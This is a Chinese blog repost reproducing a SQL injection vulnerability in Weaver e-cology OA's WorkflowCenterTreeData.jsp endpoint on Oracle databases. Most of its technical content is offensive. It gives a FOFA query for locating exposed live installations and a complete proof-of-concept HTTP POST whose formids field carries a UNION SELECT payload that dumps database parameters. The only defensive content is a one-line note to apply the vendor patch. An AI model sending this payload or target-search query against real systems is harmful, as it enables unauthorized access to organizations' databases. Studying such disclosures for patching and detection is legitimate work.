e-cology OA前台SQL注入漏洞复现是怎样的

发布时间:2021-12-10 15:48:41 作者:柒染
来源:亿速云 阅读:445

这篇文章给大家介绍e-cology OA前台SQL注入漏洞复现是怎样的,内容非常详细,感兴趣的小伙伴们可以参考借鉴,希望对大家能有所帮助。

0x00 简介

e-cology 提供了移动办公、微信办公、协同办公(OA)、流程管理、信息门户、知识管理、费控管理等功能,适用于手机和pc端,是当今比较主流的OA系统之一。

0x01 原理概述


该漏洞是由于OA系统的WorkflowCenterTreeData接口在收到用户输入的时候未进行安全过滤,oracle数据库传入恶意SQL语句,导致SQL漏洞。

0x02 影响范围


使用oracle数据库的泛微 e-cology OA 系统

0x03 环境搭建


在线环境(限今晚):

打赏(任意金额)+转发,联系作者获取

FOFA搜索:

app="泛微-协同办公OA"

自行搭建:

公众号内回复“泛微环境”

0x04 漏洞利用


找到oracle数据库的泛微OA系统后直接使用Poc(已公开)

如果不存在漏洞,则显示结果如下

e-cology OA前台SQL注入漏洞复现是怎样的

如果漏洞存在,则会直接回显很多数据

e-cology OA前台SQL注入漏洞复现是怎样的

简洁版Poc如下:(勿用于非法途径)

POST /mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333 HTTP/1.1Host: ip:portUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:56.0) Gecko/20100101 Firefox/56.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 2236Connection: closeUpgrade-Insecure-Requests: 1
formids=11111111111)))%0a%0dunion select NULL,value from v$parameter order by (((1

0x05 修复建议


官网已更新补丁,请尽快更新。

关于e-cology OA前台SQL注入漏洞复现是怎样的就分享到这里了,希望以上内容可以对大家有一定的帮助,可以学到更多知识。如果觉得文章不错,可以把它分享出去让更多的人看到。

推荐阅读:
  1. 大数据技术的4个E
  2. Quidway E050经常重启-----ios升级

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

e-cology oa sql

上一篇:e-cology OA 数据库配置信息泄露漏洞复现的实例分析

下一篇:如何解析Apache Tomcat文件包含CVE-2020-1938漏洞复现

相关阅读

您好,登录后才能下订单哦!

密码登录
登录注册
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》